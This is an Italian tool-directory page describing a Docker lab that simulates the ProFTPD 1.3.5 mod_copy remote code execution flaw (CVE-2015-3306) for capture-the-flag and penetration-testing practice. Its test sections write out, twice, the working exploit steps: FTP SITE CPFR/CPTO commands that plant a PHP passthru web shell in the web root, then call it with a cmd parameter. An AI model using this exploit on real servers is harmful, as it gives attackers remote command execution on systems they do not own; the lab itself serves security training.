Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - Configurazione Home Lab RCE (Docker) facile da usare per Red Teaming o test di penetrazione | Kitploit
Strumenti/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneRed TeamingLab e Pratica
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - Configurazione Home Lab RCE (Docker) facile da usare per Red Teaming o test di penetrazione

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

INGLESE DI SEGUITO

ProFTPD 1.3.5 (mod_copy) — Laboratorio di simulazione RCE

CVE20153306

Questo laboratorio è progettato per simulare la vulnerabilità CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
ed è pensato per apprendere la Web Shell Injection RCE attraverso il modulo mod_copy di ProFTPD.


Caratteristiche

  • ProFTPD 1.3.5 vulnerabile
  • mod_copy completamente abilitato (SITE CPFR / SITE CPTO)
  • Supporto per l'accesso FTP anonimo
  • Apache2 + PHP5 per simulare la web root /var/www/html
  • L'attaccante può usare SITE CPFR/CPTO per copiare file nella web root e attivare la RCE
  • Il sistema genera automaticamente flag_RANDOM.txt a ogni avvio del container
  • È un laboratorio per CTF / Red Team / formazione Pentest

Struttura delle directory

root@kitploit:~
/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

Utilizzo (Avvio del container)

root@kitploit:~
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

Come testare la vulnerabilità CVE-2015-3306

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Apri tramite il web:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

Flag

Si trova in:

root@kitploit:~
/tmp/flag_RANDOM.txt

Versione inglese — Laboratorio RCE ProFTPD 1.3.5 (mod_copy)

Questo laboratorio simula la CVE-2015-3306 utilizzando ProFTPD 1.3.5 con mod_copy, consentendo agli attaccanti di eseguire ProFTPD mod_copy Remote File Copy to RCE.


Caratteristiche

  • ProFTPD 1.3.5 vulnerabile compilato dal sorgente
  • mod_copy abilitato (SITE CPFR + SITE CPTO)
  • Accesso FTP anonimo
  • Apache2 + PHP5 per l'esecuzione di webshell
  • flag_RANDOM.txt generato automaticamente all'avvio del container
  • Ideale per CTF, formazione e ricerca sugli exploit

Esempio di test dell'exploit

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Quindi esegui:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

Posizione della flag

root@kitploit:~
/tmp/flag_RANDOM.txt

Disclaimer

Solo per scopi educativi e test di penetrazione autorizzati.

Scarica lo strumento